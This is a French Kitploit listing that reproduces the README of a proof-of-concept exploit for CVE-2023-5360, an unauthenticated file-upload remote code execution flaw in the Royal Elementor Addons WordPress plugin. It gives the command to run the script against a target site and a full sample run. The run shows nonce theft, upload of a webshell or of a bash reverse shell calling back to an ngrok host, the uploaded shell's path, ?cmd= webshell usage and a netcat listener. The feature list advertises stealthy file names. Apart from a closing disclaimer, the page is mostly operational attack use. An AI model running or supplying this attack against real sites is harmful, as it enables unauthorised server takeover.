Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-5360 — Royal Elementor Addons - Exécution de code à distance non authentifiée | Kitploit
Outils/GitHubGitHub/x3rx3ssec/cve-2023-5360
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'Intrusion
GitHubx3rx3ssec/cve-2023-5360

CVE-2023-5360

Royal Elementor Addons - Exécution de code à distance non authentifiée

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-5360 Exploit de téléchargement de fichiers Elementor

Le plugin WordPress Royal Elementor Addons and Templates avant la version 1.3.79 ne valide pas correctement les fichiers téléchargés, ce qui pourrait permettre à des utilisateurs non authentifiés de télécharger des fichiers arbitraires, tels que des fichiers PHP, et d'obtenir une exécution de code à distance (RCE).

root@kitploit:~
   _______    ________     
  / ____/ |  / / ____/     
 / /    | | / / __/______  
/ /___  | |/ /__/_____/  
\____/  |___/_____/_____   
  |__ \ / __ \__ \|__  /   
  __/ // / / /_/ / /_ <    
 / __// /_/ / __/___/ /    
/____/\____/____/____/____ 
   / ____/__  // ___// __ \
  /___ \  /_ </ __ \/ / / /
 ____/ /___/ / /_/ / /_/ / 
/_____//____/\____/\____/  

par X3RX3S

Description

Ceci est une preuve de concept pour CVE-2023-5360, une vulnérabilité de téléchargement de fichiers dans Elementor Pro pour WordPress. Elle permet à un attaquant non authentifié de télécharger des fichiers PHP arbitraires et d'obtenir une exécution de code à distance.

Fonctionnalités

  • Récupération automatique du nonce Elementor
  • Téléchargement d'un webshell simple ou d'un reverse shell
  • Noms de fichiers uniques pour la discrétion
  • Aide optionnelle pour l'écouteur Netcat
  • Trop classe

Utilisation

root@kitploit:~
python3 CVE-2023-5360.py <https://victim.site/>

Exemple :

root@kitploit:~
python3 CVE-2023-5360.py https://victim.site/


      _______    ________     
     / ____/ |  / / ____/     
    / /    | | / / __/______  
   / /___  | |/ /__/_____/  
   \____/  |___/_____/_____   
       |__ \ / __ \__ \|__  /   
       __/ // / / /_/ / /_ <    
      / __// /_/ / __/___/ /    
     /____/\____/____/____/____ 
         / ____/__  // ___// __ \
        /___ \  /_ </ __ \/ / / /
       ____/ /___/ / /_/ / /_/ / 
      /_____//____/\____/\____/  

         github.com/X3RX3SSec    
      by X3RX3S aka @mindfuckerrrr


[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd

[*] Step 2: Configure payload
  [1] Simple command webshell
  [2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...

[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴‍☠️💣

Options de payload :

  1. Webshell simple par commande (?cmd=id sous la forme : https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
  2. Reverse shell (Bash)

Dépendances

  • Python 3.x
  • Module requests

Installation des dépendances :

root@kitploit:~
pip install requests

Exemple d'écouteur

root@kitploit:~
nc -lvnp 1337

Avertissement

Cet exploit est destiné à des fins éducatives et de tests de sécurité autorisés uniquement. Vous êtes responsable de la façon dont vous l'utilisez. Testez uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez l'autorisation.

Crédits

Auteur : X3RX3S CVE-2023-5360

Télécharger l’outil